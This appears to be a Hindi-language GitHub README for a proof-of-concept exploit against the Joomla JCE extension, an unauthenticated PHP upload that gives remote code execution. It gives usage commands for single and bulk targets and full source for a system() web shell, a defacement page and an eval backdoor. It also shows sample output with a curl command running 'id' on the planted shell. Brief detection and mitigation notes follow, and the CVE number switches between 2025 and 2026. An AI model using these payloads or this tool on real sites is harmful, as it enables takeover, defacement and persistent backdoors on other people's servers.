
CVE-2025-48907 - अप्रमाणित RCE शोषण Joomla JCE < 2.9.99.5 के लिए
Joomla! JCE एक्सटेंशन < 2.9.99.5 - अप्रमाणित मनमाना PHP फ़ाइल अपलोड और रिमोट कोड निष्पादन
http.component:"Joomla"
app="Joomla"
इस रिपॉजिटरी में CVE-2026-48907 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है, जो 2.9.99.5 से पहले के Joomla! JCE (Joomla Content Editor) एक्सटेंशन संस्करणों में एक गंभीर भेद्यता है। यह भेद्यता अप्रमाणित हमलावरों को JCE प्रोफ़ाइल आयात कार्यक्षमता के माध्यम से मनमानी PHP फ़ाइलें अपलोड करने की अनुमति देती है, जिससे रिमोट कोड निष्पादन (RCE) होता है।
यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
- केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है
- लेखक किसी भी दुरुपयोग या अवैध गतिविधियों के लिए जिम्मेदार नहीं है
- परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें
index.php?option=com_jce&task=profiles.import)/tmp/ निर्देशिका में रखी जाती है और सीधे पहुँच के माध्यम से निष्पादित की जा सकती है# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2025-48907.git
cd CVE-2025-48907
# Install required dependencies
pip3 install requests urllib3
requests लाइब्रेरीurllib3 लाइब्रेरीpython3 CVE-2025-48907.py -u <TARGET_URL> -F <PHP_FILE_TO_UPLOAD>
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php
python3 CVE-2025-48907.py -u http://target-joomla.com -F deface.php
python3 CVE-2025-48907.py -u http://target-joomla.com -F backdoor.php
python3 CVE-2025-48907.py -f targets.txt -F payload.php
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php -v -o results.txt
* या तो -u या -f प्रदान किया जाना चाहिए
प्रति पंक्ति एक URL के साथ एक targets.txt फ़ाइल बनाएँ:
http://joomla-site1.com
https://joomla-site2.com
http://192.168.1.100/joomla
# Comments are ignored
https://example-joomla.com
सभी पेलोड PHP फ़ाइलें होनी चाहिए क्योंकि एक्सप्लॉइट PHP कोड अपलोड करता है जो सर्वर पर निष्पादित होगा।
shell.php बनाएँ:
<?php
// Simple PHP Web Shell
if(isset($_GET['cmd'])){
echo "<pre>";
system($_GET['cmd']);
echo "</pre>";
} else {
echo "Usage: ?cmd=command";
}
?>
deface.php बनाएँ:
<?php
// PHP Deface Page
echo '<!DOCTYPE html>
<html>
<head>
<title>Hacked by 0xgh057r3c0n</title>
<style>
body {
background: #000;
color: #0f0;
font-family: "Courier New", monospace;
text-align: center;
padding: 50px;
}
h1 { font-size: 4em; text-shadow: 0 0 20px #0f0; }
.ascii-art { white-space: pre; font-size: 12px; }
</style>
</head>
<body>
<h1>HACKED BY 0xgh057r3c0n</h1>
<div class="ascii-art">
██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗
██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
███████║███████║██║ █████╔╝ █████╗ ██║ ██║
██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██║ ██║
██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██████╔╝
╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═════╝
</div>
<p>Security is not a product, it\'s a process.</p>
<p>Server: <?php echo $_SERVER["SERVER_SOFTWARE"]; ?></p>
<p>Time: <?php echo date("Y-m-d H:i:s"); ?></p>
</body>
</html>';
?>
backdoor.php बनाएँ:
<?php
// Minimal PHP Backdoor
if(isset($_REQUEST['c'])) { eval($_REQUEST['c']); }
?>
_____________ _______________ _______________ ________ ________ _____ ______ ________________________
\_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \/ _____/ / | | / __ \/ __ \ _ \______ \
/ \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ __ \ ______ / | |_> <\____ / /_\ \ / /
\ \____\ / | \ /_____/ / \ \_/ \/ \ |__\ \ /_____/ / ^ / -- \ / /\ \_/ \/ /
\______ / \___/ /_______ / \_______ \_____ /\_______ \_____ / \____ |\______ / /____/ \_____ /____/
\/ \/ \/ \/ \/ \/ |__| \/ \/
Joomla! JCE extension < 2.9.99.5 Unauthenticated RCE
Author : 0xgh057r3c0n (PHP File Upload)
[*] Loaded 3 target(s)
[*] Target 1/3
[*] ==================================================
[+] Target: http://target-joomla.com
[+] Fetching CSRF token...
[+] CSRF Token: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6
[+] Uploading PHP file: cve-2026-48907-1234.xml.php
[+] Profile imported successfully!
[+] Testing uploaded PHP file...
============================================================
[!!!!!] PHP FILE UPLOADED SUCCESSFULLY!
[!!!!!] Server IS VULNERABLE to CVE-2025-48907!
============================================================
[+] View your uploaded PHP file: http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php
[+] Quick access:
curl "http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php?cmd=id"
/tmp/ निर्देशिका में संदिग्ध PHP फ़ाइलों की जाँच करेंindex.php?option=com_jce&task=profiles.import अनुरोधों की तलाश करें/tmp/ में .xml.php एक्सटेंशन वाली फ़ाइलों की जाँच करें/tmp/ निर्देशिका से असामान्य PHP निष्पादन की निगरानी करेंJCE एक्सटेंशन अपडेट करें:
अस्थायी कार्य-समाधान:
/tmp/ निर्देशिका में PHP निष्पादन प्रतिबंधित करेंallow_url_fopen अक्षम करेंसमझौता के बाद की कार्रवाइयाँ:
/tmp/ से अपलोड की गई PHP फ़ाइलें हटाएँयह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
योगदान का स्वागत है! कृपया बेझिझक एक पुल रिक्वेस्ट सबमिट करें।
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)यदि आपको यह उपकरण उपयोगी लगता है, तो कृपया इसे GitHub पर एक स्टार ⭐ देने पर विचार करें!
| गुण | मान |
|---|
| CVE आईडी | CVE-2026-48907 |
| उत्पाद | Joomla! JCE Extension |
| प्रभावित संस्करण | < 2.9.99.5 |
| भेद्यता प्रकार | अप्रमाणित PHP फ़ाइल अपलोड → RCE |
| CVSS स्कोर | 9.8 (गंभीर) |
| हमला वेक्टर | नेटवर्क |
| प्रमाणीकरण | कोई आवश्यक नहीं |
| प्रभाव | पूर्ण सिस्टम समझौता |
| तर्क | आवश्यक | विवरण |
|---|
-u, --url | हाँ* | एकल लक्ष्य URL (जैसे, http://target.com) |
-f, --file | हाँ* | लक्ष्य URL की सूची वाली फ़ाइल (प्रति पंक्ति एक) |
-F, --upload-file | हाँ | अपलोड करने के लिए PHP फ़ाइल (शेल, बैकडोर, विकृति पृष्ठ) |
-v, --verbose | नहीं | डिबगिंग के लिए वर्बोज़ आउटपुट सक्षम करें |
-o, --output | नहीं | सफल अपलोड URL को फ़ाइल में सहेजें |